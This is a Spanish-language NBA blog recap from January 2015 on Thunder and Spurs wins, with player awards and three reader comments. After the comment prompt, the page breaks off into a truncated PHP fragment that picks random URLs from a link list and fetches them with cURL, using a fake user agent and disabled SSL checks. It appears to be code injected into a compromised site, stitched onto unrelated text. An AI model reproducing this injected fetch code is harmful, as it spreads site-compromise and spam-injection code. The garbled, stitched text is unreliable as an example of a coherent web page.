La Crónica: Over .500

21 de January de 2015 por TheDeerHunter

Antes de explicaros que dio de sí la mini jornada de la NBA permitidnos que anunciemos que este es el artículo número 3001 que publicamos en el blog. Nosotros somos así, tan concentrados en el trabajo que se nos pasan por alto las efemérides importantes. Como ya expresamos en twitter y facebook: Gracias a todos por dejarnos escribir tanto, por leernos y por participar.

Y ahora sin más dilación, la crónica.

Tercera victoria consecutiva de los Thunder, esta sobre Miami, que continúa de este modo su escalada por la escarpada clasificación del Oeste. ¡Ojo que ayer jugaban 3 de los 4 finalistas de los últimos años y sólo los Spurs partían por encima del 50% victorias-derrotas!

Los promedios de Kevin Durant los últimos 4 partidos asustan: 28.3 ppp, 70.5%FG, 47.4%3p ,8.8rpp… Aunque parezca increíble el vigente MVP ha dado una vuelta de tuerca a su nivel de acierto durante los 18 partidos que ha podido disputar este curso. Anoche, sin embargo, no fue su noche más fina de cara al aro y para colmo dió el susto, nada baladí de lesión, en una mala caída tras mate durante el último cuarto. Al parecer no será nada y Durant fue el máximo responsable de la victoria con una completa actuación que le pemitió rozar el triple doble. Además destacó, cómo no, Russell Westbrook y Morrow y Jackson aportaron desde el banquillo. Los Heat, que poco tienen que ver con los que les privaron del anillo en el 2012, se atascaron ante la defensa que propone Brooks y perdieron un buen número de balones que facilitaron mucho las cosas al habitual juego directo de sus rivales. Para más inri, el que parece el jugador estrella de los de Miami últimamente, Hassan Whiteside se lesionó en el segundo cuarto y ya no pudo volver a la cancha.

Lo malo para los Thunder es que si estudian la clasificación les costará encontrar un rival por los playoffs que baje del 70% de victorias los últimos 10 partidos. La previsión es que los Thunder necesitan 33 victorias sobre 41 partidos restantes para alcanzar la parte alta del cuadro aunque un 27-14 podrían ser suficiente para asegurar su presencia en la pelea por el título. Nadie dijo que fuera fácil.

En el otro partido de la jornada los campeones derrotaron a Denver con su clásico juego colectivo con Kawhi Leonard a la cabeza. No obstante si fuera Popovich seguiría estando bastante preocupado por el roto que les causaron Kenneth Faried y Jusuf Nurkic por dentro. Arron Afflalo también se resarció de su horripilante partido anterior pero no fue suficiente para romper la racha de 4 derrotas seguidas y una nueva fase depresiva para el equipo de Shaw.

PREMIOS

MVP: Combo típico Durant-Westbrook -> 38 puntos, 18 rebotes, 14 asistencias, 8 robos… Un día más en la oficina.

Rookie: Jusuf Nurkic se quedó en 10 puntos, 9 rebotes y 2 asistencias. Decimos “se quedó” porque concentró toda su producción en poco tiempo (26 minutos) y durante las primeras fases del partido.

Sorpresa: Uno de los hombres a seguir los últimos partidos… Hassan Whiteside iba camino de liarsela muy parda a los Thunder con 5 de 5 en 11 minutos. Sólo una inoportuna lesión le detuvo.

Decepción: Dion Waiters vuelve a las andadas del desacierto más lamentable unido a “no cortarse ni un pelo”. 1 de 9 y un parcial de -6 con su persona en cancha.

Esfuerzo en vano: Uno de esos días en los que Kenneth Faried se gana el apodo de “Manimal“. 26-14. Ay si se prodigara más en estos términos.

 

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Spurs y Thunder están empezando su escalada en pos de los primeros de la conferencia. Sin duda el Oeste es una locura y va a ser una lucha preciosa. Sólo espero que las lesiones no se carguen a ninguno de los equipos porque la lucha va a ser increible.
    A los Spurs se les nota sobremanera la vuelta de Parker y sobretodo de Kawhi que es el pegamento del equipo. Pone energía, defensa, rebote y puntos para llevar el juego de los del Alamo un nivel por encima. Aún les queda ajustar bien su defensa, pero ya empiezan a dar miedo.
    En cuanto a los Thunder, con sus dos superestrellas carburando y por primera vez desde que se fue Harden con un banquillo que puede aportar puntos (Waiters, Jackson, Morrow), están llamados a ser uno de los animadores de lo que queda de temporada regular, necesitados además como están de sumar victorias para colocarse primero en PO y luego aspirar a la ventaja campo.

      Citar

  2. TheDeerHunter dice:
    #2

    Los Thunder lo tienen casi imposible para colocarse primeros.

      Citar

  3. Azabel dice:
    #3

    TheDeerHunter:
    Los Thunder lo tienen casi imposible para colocarse primeros.

    si Durat recupera su forma, y como bien dice GreenPride, Jakcson, Waiters y Morrow sigen aportando desde la banca, no necesitaran ser primeros, no me queda ninguna duda que aun sin ventaja de localia son los candidatos naturales del oeste
    peeeeeeeeeeero para eso falta, Durant aun no esta en su mejor forma y todavía no encuentra el aro como el sabe, y lo de Waiters a pesar de algunos buenos partidos todavía es una incógnita

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>